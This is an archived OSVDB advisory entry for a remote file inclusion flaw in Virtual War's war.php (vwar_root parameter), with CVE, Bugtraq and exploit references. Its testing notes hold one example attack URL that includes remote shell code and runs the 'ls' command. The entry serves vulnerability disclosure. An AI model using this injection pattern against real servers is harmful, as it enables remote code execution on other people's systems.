Virtual War (Vwar) war.php vwar_root Variable Remote File Inclusion

2006-08-07T04:40:10
ID OSVDB:29113
Type osvdb
Reporter OSVDB
Modified 2006-08-07T04:40:10

Description

Manual Testing Notes

http://[target]/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls

References:

Vendor URL: http://www.vwar.de/ Related OSVDB ID: 29119 Related OSVDB ID: 29114 Related OSVDB ID: 29115 Related OSVDB ID: 29117 Related OSVDB ID: 29118 Related OSVDB ID: 29116 Other Advisory URL: http://liz0zim.no-ip.org/vwar.txt Other Advisory URL: http://www.blogcu.com/Liz0ziM/431925/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0117.html ISS X-Force ID: 28265 Generic Exploit URL: http://www.milw0rm.com/exploits/1658 CVE-2006-1747 Bugtraq ID: 19387 Bugtraq ID: 17443